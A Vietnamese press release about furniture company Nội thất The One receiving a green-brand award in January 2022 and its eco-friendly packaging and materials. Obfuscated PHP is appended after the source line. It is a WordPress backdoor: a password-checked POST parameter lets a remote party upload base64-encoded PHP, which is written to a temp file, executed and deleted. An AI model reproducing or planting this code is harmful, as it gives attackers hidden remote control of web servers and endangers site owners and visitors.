Nội thất The One nhận danh hiệu Top 10 Thương hiệu Xanh trong CMCN 4.0

Ngày 16/01/2022, lễ công bố “Thương hiệu xanh trong CMCN 4.0” đã được diễn ra tại Trung tâm Hội nghị Quốc tế, số 35 Hùng Vương, Ba Đình, HN và truyền hình trực tiếp trên Đài Kỹ thuật số VTC. Năm nay, Công ty cổ phần TM&SX Nội thất The One đã vinh dự được trao tặng giải thưởng TOP 10 Thương hiệu Xanh trong CMCN 4.0.


(Các Doanh nghiệp trong Top 10 Thương hiệu Xanh trong CMCN4.0)

Đây là chương trình nhằm tôn vinh các doanh nghiệp/thương hiệu ứng dụng công nghệ xanh, thực hiện tốt trách nhiệm bảo vệ môi trường trong quản lý và sản xuất. Qua đó, quảng bá những Thương hiệu Việt chất lượng có nhiều sáng kiến trong quản lý kinh doanh gắn với bảo vệ môi trường, phát triển bền vững đến với thị trường quốc tế. Với gần 3 thập kỷ hoạt động trong lĩnh vực sản xuất nội thất, Công ty CP TM &SX Nội thất The One đã vinh dự được trao tặng giải thưởng Top 10 Thương hiệu Xanh cho những nỗ lực không ngừng nghỉ nhằm bảo vệ môi trường sống.


(Đại diện Công ty CP TM&SX Nội thất The One nhận danh hiệu Top 10 Thương hiệu Xanh)

Thành lập năm 1995, Công ty CP TM&SX Nội thất The One, tiền thân là công ty cổ phần Nội thất Hòa Phát được biết đến như thương hiệu nội thất “quốc dân” trong lòng người Việt. Đại diện cho sự thành công của thương hiệu là hệ thống phân phối rộng khắp 63 tỉnh thành với hàng ngàn đại lý, Nội thất The One đã thành công khi tạo nên sự gắn bó thương hiệu với nhiều thế hệ người Việt Nam, khi người tiêu dùng liên tục ghi nhớ về thương hiệu nội thất “made in Vietnam” với chất lượng bền đẹp, thiết kế phong phú, đa dạng sản phẩm, đem lại nhiều lựa chọn cho người sử dụng.

Thấu hiểu trách nhiệm của doanh nghiệp dẫn đầu ngành hàng sản xuất, Nội thất The One đặt ra bài toán tối giản nguyên vật liệu tự nhiên trong sản xuất & hạn chế tối đa vật liệu nhựa trong đóng gói, nhằm giảm thải tác hại ô nhiễm không khí, ô nhiễm nguồn nước ra môi trường. Đây là các bước được Nội thất The One đặc biệt chú trọng, nghiên cứu cải tiến, áp dụng đúng lộ trình đặt ra trong những năm gần đây trong công cuộc dẫn đầu ngành hàng về bảo vệ môi trường sống.

Theo các chuyên gia từ Nội thất The One, tối giản nguyên vật liệu tự nhiên bằng vật liệu thân thiện với môi trường được áp dụng nhiều trong các công trình công cộng, tòa nhà chung cư … là vật liệu gỗ công nghiệp chất lượng cao, được kiểm soát nghiêm ngặt nồng độ chất formaldehyde trong sản phẩm nội thất, đem lại độ an toàn tuyệt đối cho không khí trong nhà, đảm bảo về chất lượng cùng hài lòng về mẫu mã cho người sử dụng.

Cùng việc phát triển các sản phẩm từ gỗ công nghiệp chất lượng cao, hạn chế tối đa vật liệu nhựa trong đóng gói cũng được Nội thất The One quan tâm thực hiện. Theo đó, các sản phẩm ghế từ vật liệu PVC, DP như ghế họp SL, dòng ghế nhân viên, ghế quầy bar SB, ghế gấp, ghế MC … một số dòng ghế da, dòng ghế lãnh đạo lưng cao, lưng trung không sử dụng nilon mà được đóng gói trực tiếp với bao bì giấy theo tiêu chuẩn của Nội thất The One.

Đối với các sản phẩm khác, việc ưu tiên tìm kiếm & sử dụng vật liệu thay thế nilon trong đóng gói được Nội thất The One triển khai nhiều năm nay, trong đó vật liệu xốp PE thân thiện với môi trường, có thể tái chế, sử dụng trong nhiều mục đích tại nhà xưởng sẽ được dùng để bọc gói các sản phẩm ghế da cao cấp cỡ lớn như dòng ghế TQ có cơ cấu ngả, ghế sofa da. Theo ước tính, hàng triệu chiếc ghế được thay đổi quy cách đóng gói sẽ mang lại lợi ích từ việc tái chế các màng xốp PE này, thông qua con đường tái sử dụng tại nhà máy và thông qua đại lý của Nội thất The One.

Xu hướng xanh trong ngành sản xuất nội thất đang dần trở thành xu thế, khi mục tiêu phát triển doanh nghiệp gắn liền với nhiệm vụ bảo vệ môi trường, đặc biệt trong bối cảnh các nước đang phát triển như Việt Nam, Indonesia, Myanmar thải ra hàng triệu tấn bao bì mỗi ngày. Do vậy, các doanh nghiệp lớn trong ngành sản xuất nói chung, ngành nội thất nói riêng phải hoạch định chiến lược phát triển bền vững, không chỉ kinh tế mà còn bảo vệ môi trường sống bao gồm: nguồn nước, không khí, đất đai … Đây cũng là hướng phát triển được Nội thất The One đặc biệt quan tâm phát triển trong tương lai tới, hướng tới môi trường xanh sạch.

Nguồn: Nội Thất The One

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}